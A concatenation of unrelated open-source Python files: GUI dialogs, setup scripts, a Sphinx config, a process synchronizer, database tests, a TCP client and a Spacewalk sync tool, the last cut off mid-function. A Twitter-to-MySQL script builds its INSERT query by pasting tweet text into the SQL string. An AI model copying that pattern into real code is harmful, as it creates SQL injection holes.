# encoding: utf-8 ''' @author: Jose Emilio Romero Lopez @copyright: Copyright 2013-2014, Jose Emilio Romero Lopez. @license: GPL @contact: [email protected] This file is part of APASVO. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. ''' from PySide import QtGui from apasvo.gui.views.generated import ui_loaddialog from apasvo.utils.formats import rawfile FORMATS = {'Autodetect': None, 'Binary': rawfile.format_binary, 'Text': rawfile.format_text, } DEFAULT_FORMAT = 'Autodetect' DTYPES = (rawfile.datatype_int16, rawfile.datatype_int32, rawfile.datatype_int64, rawfile.datatype_float16, rawfile.datatype_float32, rawfile.datatype_float64, ) DTYPES_LABELS = ('16 bits, PCM', '32 bits, PCM', '64 bits, PCM', '16 bits, float', '32 bits, float', '64 bits, float', ) BYTEORDERS = (rawfile.byteorder_little_endian, rawfile.byteorder_big_endian) class LoadDialog(QtGui.QDialog, ui_loaddialog.Ui_LoadDialog): """A dialog window to load seismic data stored in a binary or text file. Allows the user to choose several settings in order to load a seismic signal, i.e.: Format: Binary or text format. Data-type: Float16, Float32 or Float64, Endianness: Little-endian or big-endian. Sample rate. The class also infers the right parameters for the chosen file and shows a preview of the loaded data for the selected parameters. Attributes: filename: Name of the opened file. 
""" def __init__(self, parent, filename): super(LoadDialog, self).__init__(parent) self.setupUi(self) self.FileFormatComboBox.currentIndexChanged.connect(self.on_format_change) self.FileFormatComboBox.currentIndexChanged.connect(self.load_preview) self.DataTypeComboBox.currentIndexChanged.connect(self.load_preview) self.ByteOrderComboBox.currentIndexChanged.connect(self.load_preview) # init file format combobox self.FileFormatComboBox.addItems(FORMATS.keys()) self.FileFormatComboBox.setCurrentIndex(FORMATS.keys().index(DEFAULT_FORMAT)) # init datatype combobox self.DataTypeComboBox.addItems(DTYPES_LABELS) self.DataTypeComboBox.setCurrentIndex(DTYPES.index(rawfile.datatype_float64)) self.filename = filename self.load_preview() def on_format_change(self, idx): """Updates UI after toggling the format value.""" fmt = FORMATS[self.FileFormatComboBox.currentText()] if fmt == rawfile.format_binary: self.DataTypeComboBox.setVisible(True) self.DataTypeLabel.setVisible(True) self.ByteOrderComboBox.setVisible(True) self.ByteOrderLabel.setVisible(True) self.groupBox_2.setVisible(True) self.SampleFrequencySpinBox.setVisible(True) self.SampleFrequencyLabel.setVisible(True) elif fmt == rawfile.format_text: self.DataTypeComboBox.setVisible(False) self.DataTypeLabel.setVisible(False) self.ByteOrderComboBox.setVisible(False) self.ByteOrderLabel.setVisible(False) self.groupBox_2.setVisible(True) self.SampleFrequencySpinBox.setVisible(True) self.SampleFrequencyLabel.setVisible(True) else: self.DataTypeComboBox.setVisible(False) self.DataTypeLabel.setVisible(False) self.ByteOrderComboBox.setVisible(False) self.ByteOrderLabel.setVisible(False) self.groupBox_2.setVisible(False) self.SampleFrequencySpinBox.setVisible(False) self.SampleFrequencyLabel.setVisible(False) self.groupBox.adjustSize() self.adjustSize() def load_preview(self): """Shows a preview of loaded data using the selected parameters.""" # Load parameters values = self.get_values() try: # Set up a file handler according to the type of raw data (binary or text) fhandler = rawfile.get_file_handler(self.filename, **values) # Print data preview array = fhandler.read_in_blocks().next() data = '' for x in array: data += ("%g\n" % x) except: data = '*** There was a problem reading the file content ***' self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(False) else: self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(True) self.PreviewTextEdit.clear() self.PreviewTextEdit.setText(data) def get_values(self): """Gets selected parameters.""" return {'fmt': FORMATS[self.FileFormatComboBox.currentText()], 'dtype': DTYPES[self.DataTypeComboBox.currentIndex()], 'byteorder': BYTEORDERS[self.ByteOrderComboBox.currentIndex()], 'fs': float(self.SampleFrequencySpinBox.value())}
# Copyright (c) 2011 Red Hat, Inc. # # This software is licensed to you under the GNU Lesser General Public # License as published by the Free Software Foundation; either version # 2 of the License (LGPLv2) or (at your option) any later version. # There is NO WARRANTY for this software, express or implied, # including the implied warranties of MERCHANTABILITY, # NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should # have received a copy of LGPLv2 along with this software; if not, see # http://www.gnu.org/licenses/old-licenses/lgpl-2.0.txt. # # Jeff Ortel <[email protected]> # from setuptools import setup, find_packages setup( name='gofer', version='3.0.0', description='Universal python agent', author='Jeff Ortel', author_email='[email protected]', url='https://github.com/jortel/gofer', license='GPLv2+', packages=find_packages(), scripts=[ '../bin/gofer', '../bin/goferd', ], include_package_data=False, data_files=[], classifiers=[ 'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)', 'Programming Language :: Python', 'Operating System :: POSIX :: Linux', 'Topic :: System :: Distributed Computing', 'Topic :: Software Development :: Libraries :: Python Modules', 'Intended Audience :: Developers', 'Development Status :: 5 - Production/Stable', ], install_requires=[ ], )
# -*- coding: utf-8 -*- # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import os import sys sys.path.insert(0, os.path.abspath('../..')) # -- General configuration ---------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = [ 'openstackdocstheme', 'sphinx.ext.autodoc', ] # autodoc generation is a bit aggressive and a nuisance when doing heavy # text edit cycles. # execute "export SPHINX_DEBUG=1" in your terminal to disable # The suffix of source filenames. source_suffix = '.rst' # The master toctree document. master_doc = 'index' # General information about the project. project = u'kolla' copyright = u'2013-present, OpenStack Foundation' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. from kolla.version import version_info as kolla_version # The full version, including alpha/beta/rc tags. release = kolla_version.version_string_with_vcs() # The short X.Y version. version = kolla_version.canonical_version_string() # If true, '()' will be appended to :func: etc. cross-reference text. add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). add_module_names = True # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # -- Options for HTML output -------------------------------------------------- # The theme to use for HTML and HTML Help pages. Major themes that come with # Sphinx are currently 'default' and 'sphinxdoc'. # html_theme_path = [] html_theme = 'openstackdocs' # html_static_path = ['static'] # Output file base name for HTML help builder. htmlhelp_basename = '%sdoc' % project # Must set this variable to include year, month, day, hours, and minutes. html_last_updated_fmt = '%Y-%m-%d %H:%M' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass # [howto/manual]). latex_documents = [ ('index', '%s.tex' % project, u'%s Documentation' % project, u'OpenStack Foundation', 'manual'), ] # openstackdocstheme options repository_name = 'openstack/kolla' bug_project = 'kolla' bug_tag = ''
import os import time import glob import fcntl import errno from AdaptivePELE.utilities import utilities try: ProcessLookupError except NameError: ProcessLookupError = OSError class ProcessesManager: """ Object that sinchronizes multiple adaptivePELE instances, designed to be able to use multiple nodes of a gpu cluster """ RUNNING = "RUNNING" WAITING = "WAITING" INIT = "INIT" def __init__(self, output_path, num_replicas): self.syncFolder = os.path.join(os.path.abspath(output_path), "synchronization") utilities.makeFolder(self.syncFolder) self.lockFile = os.path.join(self.syncFolder, "syncFile.lock") self.pid = os.getpid() self.nReplicas = num_replicas self.id = None self.lockInfo = {} self.status = self.INIT self.sleepTime = 0.5 self.createLockFile() self.lock_available = True self.testLock() self.writeProcessInfo() self.initLockFile() self.syncStep = 0 def __len__(self): # define the size of the ProcessesManager object as the number of # processes return len(self.lockInfo) def testLock(self): """ Run a test to check if the file systems supports lockf and store it in the lock_available attribute """ file_lock = open(self.lockFile, "r+") try: fcntl.lockf(file_lock, fcntl.LOCK_EX) except (IOError, OSError) as exc: if exc.errno != errno.ENOLCK: raise # if only one replica is running we don't need synchronization, # so we can still run even if we are using a filesystem that # does not support lockf if self.nReplicas > 1: raise ValueError("There was a problem allocating a lock, this usually happens when the filesystem used does not support lockf, such as NFS") else: self.lock_available = False return self.lock_available = True def writeProcessInfo(self): """ Write the information of the running process to create the sync file """ with open(os.path.join(self.syncFolder, "%d.proc" % self.pid), "w") as fw: fw.write("%d\n" % self.pid) def createLockFile(self): """ Create the lock file """ try: # whith the flags set, if the file exists the open will fail fd = os.open(self.lockFile, os.O_CREAT | os.O_EXCL) os.close(fd) except OSError: return file_lock = open(self.lockFile, "w") file_lock.write("0\n") file_lock.close() def initLockFile(self): """ Initialize and write the information for the current process """ while True: processes = glob.glob(os.path.join(self.syncFolder, "*.proc")) processes.sort() if len(processes) > self.nReplicas: raise utilities.ImproperParameterValueException("More processors files than replicas found, this could be due to wrong number of replicas chosen in the control file or files remaining from previous that were not clean properly") if len(processes) != self.nReplicas: time.sleep(self.sleepTime) continue # only reach this block if all processes have written their own # files for i, process_file in enumerate(processes): process = int(os.path.splitext(os.path.split(process_file)[1])[0]) self.lockInfo[process] = (i, set([self.status])) if process == self.pid: self.id = i break file_lock = open(self.lockFile, "r+") while True: if self.lock_available: # if the filesystem does not support locks but only one replica # is running we will use no locks fcntl.lockf(file_lock, fcntl.LOCK_EX) if self.isMaster(): self.writeLockInfo(file_lock) if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_UN) file_lock.close() return else: lock_info = self.getLockInfo(file_lock) if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_UN) # ensure that all process are created before continuing if sorted(list(lock_info)) == sorted(list(self.lockInfo)): file_lock.close() return def 
getLockInfo(self, file_descriptor): """ Return the info stored in the lock file :param file_descriptor: File object of the lock file :type file_descriptor: file :returns: dict -- A dictonary containing the information of the different process managers initialized """ info = {} file_descriptor.seek(0) for line in file_descriptor: if line == "0\n": break pid, id_num, label = line.rstrip().split(":") info[int(pid)] = (int(id_num), set(label.split(";"))) return info def writeLockInfo(self, file_descriptor): """ Write the lock info to the lock file :param file_descriptor: File object of the lock file :type file_descriptor: file """ file_descriptor.seek(0) for pid, data in self.lockInfo.items(): id_num, status_set = data file_descriptor.write("%d:%d:%s\n" % (pid, id_num, ";".join(status_set))) file_descriptor.truncate() def isMaster(self): """ Return wether the current process is the master process :returns: bool -- Whether the current process is master """ return self.id == 0 def setStatus(self, status): """ Set the current status of the process :param status: Status of the process (INIT, WAITING or RUNNING) :type status: str """ self.status = status file_lock = open(self.lockFile, "r+") if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_EX) self.lockInfo = self.getLockInfo(file_lock) self.lockInfo[self.pid][1].add(self.status) self.writeLockInfo(file_lock) if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_UN) file_lock.close() def getStatus(self): """ Return the current status of the process :returns: str -- Status of the process """ return self.status def isSynchronized(self, status): """ Return wether all processes are synchronized, that is, they all have the same status :param status: Status of the process (INIT, WAITING or RUNNING) :type status: str :returns: bool -- Whether all processes are synchronized """ assert len(self.lockInfo) > 0, "No processes found in lockInfo!!!" for pid in self.lockInfo: if status not in self.lockInfo[pid][1]: return False return True def synchronize(self, status): """ Create a barrier-like situation to wait for all processes to finish """ while True: if self.isSynchronized(status): return file_lock = open(self.lockFile, "r+") if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_EX) self.lockInfo = self.getLockInfo(file_lock) if self.lock_available: fcntl.lockf(file_lock, fcntl.LOCK_UN) file_lock.close() def allRunning(self): """ Check if all processes are still running """ for pid in self.lockInfo: try: os.kill(pid, 0) except ProcessLookupError: utilities.print_unbuffered("Process %d not found!!!" 
% pid) return False return True def writeEquilibrationStructures(self, path, structures): """ Write the equilibration structures for the current replica :param path: Path where to write the structures :type path: str :param structures: Filename with the structures :type structures: list """ outfile = os.path.join(path, "structures_equilibration_%d.txt" % self.id) with open(outfile, "w") as fw: fw.write(",".join(structures)) def readEquilibrationStructures(self, path): """ Read the equilibration structures for all replicas :param path: Path from where to read the structures :type path: str """ files = glob.glob(os.path.join(path, "structures_equilibration_*.txt")) assert len(files) == self.__len__(), "Missing files for some of the replicas" structures = [] for i in range(self.__len__()): with open(os.path.join(path, "structures_equilibration_%d.txt" % i)) as fr: structure_partial = fr.read().rstrip().split(",") if structure_partial != [""]: structures.extend(structure_partial) return structures def getStructureListPerReplica(self, initialStructures, trajsPerReplica): """ Filter the list of initial structures to select only the ones corresponding to the current replica :param initialStructures: Name of the initial structures to copy :type initialStructures: list of str :param trajsPerReplica: Number of trajectories that each replica has to calculate :type trajsPerReplica: int :returns: list -- List with a tuple containing the initial structures of the replica and their indices """ n_structures = len(initialStructures) end = min(n_structures, (self.id+1)*trajsPerReplica) return [(i, initialStructures[i]) for i in range(self.id*trajsPerReplica, end)] def getBarrierName(self): """ Create a unique status name so that every time we synchronize we do it under a different name """ self.syncStep += 1 return "%s-%d" % (self.WAITING, self.syncStep) def barrier(self): """ Create a barrier """ status = self.getBarrierName() self.setStatus(status) self.synchronize(status)
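# A hedged usage sketch for the ProcessesManager class above. The import path,
# output folder and replica count are made up for illustration; the real module
# location inside AdaptivePELE may differ. Each replica builds its own manager
# against a shared output folder, does its share of the work, and then waits on
# a named barrier so that all replicas stay in lock-step.
#
# from AdaptivePELE.utilities.synchronization import ProcessesManager  # assumed path
#
# manager = ProcessesManager("simulation_output", num_replicas=4)
# if manager.isMaster():
#     pass  # e.g. prepare shared input files exactly once
# manager.setStatus(ProcessesManager.RUNNING)
# # ... per-replica work here ...
# manager.barrier()            # block until every replica reaches this point
# if not manager.allRunning():
#     raise RuntimeError("A replica died during the run")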
""" Copyright (c) 2004-Present Pivotal Software, Inc. This program and the accompanying materials are made available under the terms of the under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from gppylib.db import dbconn from tinctest import TINCTestCase from mpp.models import SQLTestCase import mpp.gpdb.tests.storage.walrepl.lib from mpp.gpdb.tests.storage.walrepl.run import StandbyRunMixin import subprocess class SQLwithStandby(StandbyRunMixin, SQLTestCase): """ This test case is a template to peform SQL while standby is running. We don't connect to standby, but just see the primary's behavior. For standby's correctness, see promote test cases. @gucs gp_create_table_random_default_distribution=off """ sql_dir = 'sql' ans_dir = 'ans' out_dir = 'output' def run_test(self): """ Override SQLTestCase method. Create a standby and run SQL. """ sql_file = self.sql_file ans_file = self.ans_file self.assertEqual(self.standby.create(), 0) res = self.standby.start() self.assertTrue(res.wasSuccessful()) # wait for the walreceiver to start num_walsender = self.wait_for_walsender() self.assertEqual(num_walsender, 1) result = super(SQLwithStandby, self).run_test() return result class ShutdownTestCase(StandbyRunMixin, TINCTestCase): def test_smartshutdown(self): """ @description smartshutdown should be able to stop standby replay. @tags sanity """ res = self.standby.create() self.assertEqual(res, 0) res = self.standby.start() self.assertTrue(res.wasSuccessful()) # wait for the walreceiver to start num_walsender = self.wait_for_walsender() self.assertEqual(num_walsender, 1) proc = subprocess.Popen(['pg_ctl', '-D', self.standby_datadir, 'stop'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = proc.communicate() self.assertEqual(proc.returncode, 0) return True
#!/usr/bin/env python3
#coding=utf-8
## Install and initialize the site's databases
import sys, model, json, utils


def dumpVersion2Json(modname, wid):
    _info = model.get_rom_by_wid(wid)
    result = {}
    if _info:
        _vid = _info['version']
        _dumpfilename = 'static/downloads/' + modname + '/uinfo_' + _vid + '.json'
        result = json.dumps(_info, ensure_ascii=False)
        utils.saveBin(_dumpfilename, result)
        print('Dumping products..:', wid, _dumpfilename)
    return result


def upgrade_dump_json_all():
    _alldev = model.get_devices()
    for dev in _alldev:
        _modname = dev['m_device']
        _detail = model.get_roms_by_devicesname(_modname, -1)
        if _detail:
            for post in _detail:
                dumpVersion2Json(_modname, post['id'])


def main():
    print('''usage: \n ----"install.py install" to initiate the databases \r\n ----"install.py upgrade" to upgrade the databases \r\nAfter that, run "python server.py 18080" to start the web server \r\n ''')
    if len(sys.argv) > 1:
        if sys.argv[1] == "install":
            model.installmain()
            exit()
        elif sys.argv[1] == "upgrade":
            upgrade_dump_json_all()
            exit()


if __name__ == '__main__':
    main()
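# A minimal sketch (not part of install.py) showing how a consumer could read
# back one of the uinfo_<version>.json files dumped above. The helper name and
# example arguments are assumptions; the path layout mirrors dumpVersion2Json()
# and the fields are whatever model.get_rom_by_wid returned.
import json

def load_rom_info(modname, version):
    path = 'static/downloads/%s/uinfo_%s.json' % (modname, version)
    with open(path, encoding='utf-8') as fh:
        return json.load(fh)

# info = load_rom_info('example_device', '1.0')   # hypothetical device/version
# print(info.get('version'))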
from setuptools import setup
import os
import re

PACKAGENAME = 'varsim'
packageDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), PACKAGENAME)
versionFile = os.path.join(packageDir, 'version.py')

# Obtain the package version
with open(versionFile, 'r') as f:
    s = f.read()
# Look up the string value assigned to __version__ in version.py using a regexp
versionRegExp = re.compile("__VERSION__ = \"(.*?)\"")
# Assign to __version__
__version__ = versionRegExp.findall(s)[0]
print(__version__)

setup(  # package information
    name=PACKAGENAME,
    version=__version__,
    description='A package to simulate observations of variable sources over large areas of the sky',
    long_description=''' ''',
    # What code to include as packages
    packages=[PACKAGENAME],
    package_dir={PACKAGENAME: 'varsim'},
    # What data to include as packages
    include_package_data=True,
    package_data={PACKAGENAME: ['example_data/example_pointings.csv']}
)
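# A self-contained sketch (not part of varsim) of the version-extraction idea
# used above, wrapped as a reusable helper with an explicit error when no
# __VERSION__ assignment is found. The function name is an assumption.
import re

def read_version(version_file):
    """Return the string assigned to __VERSION__ in the given file."""
    with open(version_file, 'r') as fh:
        match = re.search(r'__VERSION__\s*=\s*"(.*?)"', fh.read())
    if match is None:
        raise ValueError('No __VERSION__ assignment found in %s' % version_file)
    return match.group(1)

# read_version('varsim/version.py')  # -> e.g. "0.1.0"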
""" Simple TCP/IP Client to interface with Denis Dube, Summer 2005 """ from socket import AF_INET, SOCK_STREAM, socket import os from threading import Thread from AbstractClient import AbstractClient class TcpClient(AbstractClient): def __init__(self, serverIP='127.0.0.1', serverPort=14059, debug=True): self.serverIP = serverIP self.serverPort = serverPort self.debug = debug self.sock = None def connect(self): """ Establishes a TCP/IP connection to self.serverIP on self.serverPort """ self.sock = socket(AF_INET, SOCK_STREAM) try: self.sock.connect((self.serverIP, self.serverPort)) except: print 'Could not connect to QOCA at',self.serverIP, self.serverPort print 'QOCA connection failed in', __file__ return False input = self.read() input = input.strip() input = input.strip('\n') status, count = input.split(';') if( status == 'BUSY' ): print 'ERROR: QOCA server is too busy at IP:',self.serverIP, \ 'Port:',self.serverPort print 'QOCA server has',count, 'simultaneous connections currently' print 'QOCA connection failed in', __file__ return False elif( self.debug ): print 'TCP/IP socket connection established with', self.sock.getpeername() print 'Server status message:',status print 'Server load:',int(count)+1,'\n' return True def read(self): """ Reads one newline terminated string from the socket Blocks until newline reached Returns the string if successful, returns None on error """ buffer = '' while( 1 ): try: buffer += self.sock.recv(32) except: return None if( buffer[-1] == '\n' ): break return buffer def write(self, message): """ Sends out message to the socket If it is Returns length of message sent on success, None on error """ sentLen = 0 totalLen = len(message) while( sentLen < totalLen ): try: sentLen += self.sock.send(message) except: return None return sentLen def disconnect(self): """ Close the TCP/IP socket connection if it exists Return True if close worked, None if could not close, False if nothing to close """ if( self.sock ): try: self.write("") # This should do the trick... except: raise try: self.sock.close() return True except: return None return False
# Created by Leo from: C:\Development\Python23\Lib\site-packages\vb2py\vb2py.leo """The main form for the application""" from PythonCardPrototype import model # Allow importing of our custom controls import PythonCardPrototype.res PythonCardPrototype.res.APP_COMPONENTS_PACKAGE = "vb2py.targets.pythoncard.vbcontrols" class Background(model.Background): def __getattr__(self, name): """If a name was not found then look for it in components""" return getattr(self.components, name) def __init__(self, *args, **kw): """Initialize the form""" model.Background.__init__(self, *args, **kw) # Call the VB Form_Load # TODO: This is brittle - depends on how the private indicator is set if hasattr(self, "_MAINFORM__Form_Load"): self._MAINFORM__Form_Load() elif hasattr(self, "Form_Load"): self.Form_Load() from vb2py.vbfunctions import * from vb2py.vbdebug import * import Globals class MAINFORM(Background): def on_Command4_mouseClick(self, *args): self.Combo1.Visible = not self.Combo1.Visible def on_Command5_mouseClick(self, *args): self.Combo1.Left = self.Combo1.Left + 50 self.Combo1.Top = self.Combo1.Top + 50 def on_Command6_mouseClick(self, *args): self.Combo1.Width = self.Combo1.Width + 50 def on_Command7_mouseClick(self, *args): self.Combo1.Enabled = not self.Combo1.Enabled def on_Combo1_textUpdate(self, *args): Globals.Log('Change, \'' + self.Combo1.Text + '\'') def on_Combo1_mouseClick(self, *args): Globals.Log('Click') def on_Combo1_mouseDoubleClick(self, *args): Globals.Log('DblClick') def on_Combo1_gainFocus(self, *args): Globals.Log('GotFocus') def on_Combo1_keyDown_NOTSUPPORTED(self, *args): Globals.Log('Keydown' + ', ' + Str(KeyCode) + ', ' + Str(Shift)) def on_Combo1_keyPress_NOTSUPPORTED(self, *args): Globals.Log('KeyPress' + ', ' + Str(KeyCode) + ', ' + Str(Shift) + ', ' + self.Combo1.Text) def on_Combo1_keyUp_NOTSUPPORTED(self, *args): Globals.Log('KeyUp' + ', ' + Str(KeyCode) + ', ' + Str(Shift)) def on_Combo1_loseFocus(self, *args): Globals.Log('LostFocus') def on_Combo1_mouseDown(self, *args): Button, Shift, X, Y = vbGetEventArgs(["ButtonDown()", "ShiftDown()", "x", "y"], args) Globals.Log('MouseDown' + Str(Button) + ', ' + Str(Shift) + ', ' + Str(X) + ', ' + Str(Y)) def on_Combo1_mouseMove(self, *args): Button, Shift, X, Y = vbGetEventArgs(["ButtonDown()", "ShiftDown()", "x", "y"], args) Globals.Log('MouseMove' + Str(Button) + ', ' + Str(Shift) + ', ' + Str(X) + ', ' + Str(Y)) def on_Combo1_mouseUp(self, *args): Button, Shift, X, Y = vbGetEventArgs(["ButtonDown()", "ShiftDown()", "x", "y"], args) Globals.Log('MouseUp' + Str(Button) + ', ' + Str(Shift) + ', ' + Str(X) + ', ' + Str(Y)) def on_cmdAdd_mouseClick(self, *args): self.Combo1.AddItem('Item ' + Str(self.Combo1.ListCount + 1)) def on_cmdAddFirst_mouseClick(self, *args): self.Combo1.AddItem('First ' + Str(self.Combo1.ListCount), 0) def on_cmdClear_mouseClick(self, *args): self.Combo1.Clear() def on_cmdDump_mouseClick(self, *args): for i in vbForRange(0, self.Combo1.ListCount - 1): Debug.Print(i, self.Combo1.List(i)) def on_Delete_mouseClick(self, *args): self.Combo1.RemoveItem(self.Combo1.ListIndex) # VB2PY (UntranslatedCode) Attribute VB_Name = "frmComboBox" # VB2PY (UntranslatedCode) Attribute VB_GlobalNameSpace = False # VB2PY (UntranslatedCode) Attribute VB_Creatable = False # VB2PY (UntranslatedCode) Attribute VB_PredeclaredId = True # VB2PY (UntranslatedCode) Attribute VB_Exposed = False if __name__ == '__main__': app = model.PythonCardApp(MAINFORM) app.MainLoop()
import mysql.connector, pprint, tweepy, json, time from constants import * from mysql.connector import errorcode # Import authentication credentials from "keys.json" file try: keys = json.load(open("keys.json")) print("Keys located...\n") except: print("Unable to locate keys") # Authenticate auth = tweepy.OAuthHandler(keys['consumer_key'], keys['consumer_secret']) auth.set_access_token(keys['access_token'], keys['access_token_secret']) #Create API connection try: api = tweepy.API(auth) print("API connection secured...\n") except: print("Unable to make API connection") s = api.search(QUERY_STRING) newTweets = [] for n in s: newTweets.append(str(n.id)) try: tweet = api.get_status(n.id) except: print("No tweet found with ID: " + str(n.id)) cnx = mysql.connector.connect(user=MYSQL_USER, password=MYSQL_PASSWORD, host='localhost', database='wonders', port=3306) cursor = cnx.cursor() dateCreated = tweet._json['created_at'][-4:]+ "-04-" + tweet._json['created_at'][8:10] wonderText = tweet._json['text'].replace("\"","\\\"") wonderer = tweet._json['user']['screen_name'] id = tweet._json['id'] resolved = 1 if "!give" in wonderText and "!take" in wonderText: commandType = "'jerk'" elif "!give" in wonderText: commandType = "'give'" elif "!take" in wonderText: commandType = "'take'" else: commandType = "'none'" query = ("INSERT INTO wonders (date_created, wonder_text, wonderer, resolved, command_type, id) VALUES (\"" + dateCreated + "\", \"" + wonderText + "\", \"" + wonderer + "\", " + str(resolved) + ", " + commandType + ", " + str(id) + ")") print(query) cursor.execute(query) cnx.commit() cursor.close() cnx.close()
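# A hedged sketch (not part of the script above) of the same INSERT performed
# with a parameterized query, which lets mysql.connector handle quoting instead
# of hand-escaping the tweet text. Table and column names are taken from the
# query built above; the helper name is an assumption, and cnx is assumed to be
# an open mysql.connector connection.
def insert_wonder(cnx, date_created, wonder_text, wonderer, resolved,
                  command_type, tweet_id):
    query = ("INSERT INTO wonders "
             "(date_created, wonder_text, wonderer, resolved, command_type, id) "
             "VALUES (%s, %s, %s, %s, %s, %s)")
    cursor = cnx.cursor()
    cursor.execute(query, (date_created, wonder_text, wonderer, resolved,
                           command_type, tweet_id))
    cnx.commit()
    cursor.close()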
# # Copyright (c) 2008--2014 Red Hat, Inc. # # This software is licensed to you under the GNU General Public License, # version 2 (GPLv2). There is NO WARRANTY for this software, express or # implied, including the implied warranties of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2 # along with this software; if not, see # http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt. # # Red Hat trademarks are not licensed under GPLv2. No permission is # granted to use or replicate Red Hat trademarks that are incorporated # in this software or its documentation. # # Spacewalk Incremental Synchronization Tool # main function. # __lang. imports__ import datetime import os import sys import stat import time import types import exceptions import Queue import threading from optparse import Option, OptionParser from rhn.connections import idn_ascii_to_pune, idn_pune_to_unicode import gettext translation = gettext.translation('spacewalk-backend-server', fallback=True) _ = translation.ugettext # __rhn imports__ from spacewalk.common import rhnMail, rhnLib, rhnFlags from spacewalk.common.rhnLog import initLOG from spacewalk.common.rhnConfig import CFG, initCFG, PRODUCT_NAME from spacewalk.common.rhnTB import exitWithTraceback sys.path.append("/usr/share/rhn") from up2date_client import config from spacewalk.common.checksum import getFileChecksum from spacewalk.server import rhnSQL from spacewalk.server.rhnSQL import SQLError, SQLSchemaError, SQLConnectError from spacewalk.server.rhnServer import satellite_cert from spacewalk.server.rhnLib import get_package_path from spacewalk.common import fileutils initCFG('server.satellite') initLOG(CFG.LOG_FILE, CFG.DEBUG) # __rhn sync/import imports__ import xmlWireSource import xmlDiskSource from progress_bar import ProgressBar from xmlSource import FatalParseException, ParseException from diskImportLib import rpmsPath from syncLib import log, log2, log2disk, log2stderr, log2email from syncLib import RhnSyncException, RpmManip, ReprocessingNeeded from syncLib import initEMAIL_LOG, dumpEMAIL_LOG from syncLib import FileCreationError, FileManip from SequenceServer import SequenceServer from spacewalk.server.importlib.errataCache import schedule_errata_cache_update from spacewalk.server.importlib.importLib import InvalidChannelFamilyError from spacewalk.server.importlib.importLib import MissingParentChannelError from spacewalk.server.importlib.importLib import get_nevra, get_nevra_dict import satCerts import req_channels import messages import sync_handlers import constants _DEFAULT_SYSTEMID_PATH = '/etc/sysconfig/rhn/systemid' _DEFAULT_RHN_ENTITLEMENT_CERT_BACKUP = '/etc/sysconfig/rhn/rhn-entitlement-cert.xml' DEFAULT_ORG = 1 # the option object is used everywhere in this module... make it a # global so we don't have to pass it to everyone. OPTIONS = None # pylint: disable=W0212 class Runner: step_precedence = { 'packages': ['download-packages'], 'source-packages': ['download-source-packages'], 'errata': ['download-errata'], 'kickstarts': ['download-kickstarts'], 'rpms': [''], 'srpms': [''], 'channels': ['channel-families'], 'channel-families': [''], 'short': [''], 'download-errata': ['errata'], 'download-packages': [''], 'download-source-packages': [''], 'download-kickstarts': [''], 'arches': [''], # 5/26/05 wregglej 156079 Added arches to precedence list. 'orgs': [''], } # The step hierarchy. 
We need access to it both for command line # processing and for the actions themselves step_hierarchy = [ 'orgs', 'channel-families', 'arches', 'channels', 'short', 'download-packages', 'rpms', 'packages', 'srpms', 'download-source-packages', 'download-errata', 'download-kickstarts', 'source-packages', 'errata', 'kickstarts', ] def __init__(self): self.syncer = None self.packages_report = None self._xml_file_dir_error_message = '' self._affected_channels = None self._packages_report = None self._actions = None # 5/24/05 wregglej - 156079 turn off a step's dependents in the step is turned off. def _handle_step_dependents(self, actionDict, step): ad = actionDict if ad.has_key(step): # if the step is turned off, then the steps that are dependent on it have to be turned # off as well. if ad[step] == 0: ad = self._turn_off_dependents(ad, step) # if the step isn't in the actionDict, then it's dependent actions must be turned off. else: ad = self._turn_off_dependents(ad, step) return ad # 5/24/05 wregglej - 156079 actually turns off the dependent steps, which are listed in the step_precedence # dictionary. def _turn_off_dependents(self, actionDict, step): ad = actionDict for dependent in self.step_precedence[step]: if ad.has_key(dependent): ad[dependent] = 0 return ad def main(self): """Main routine: commandline processing, etc...""" # let's time the whole process timeStart = time.time() actionDict, channels = processCommandline() # 5/24/05 wregglej - 156079 turn off an step's dependent steps if it's turned off. # look at self.step_precedence for a listing of how the steps are dependent on each other. for st in self.step_hierarchy: actionDict = self._handle_step_dependents(actionDict, st) self._actions = actionDict # 5/26/05 wregglej - 156079 have to handle the list-channels special case. if actionDict.has_key('list-channels'): if actionDict['list-channels'] == 1: actionDict['channels'] = 1 actionDict['arches'] = 0 actionDict['channel-families'] = 1 channels = [] # create and set permissions for package repository mountpoint. 
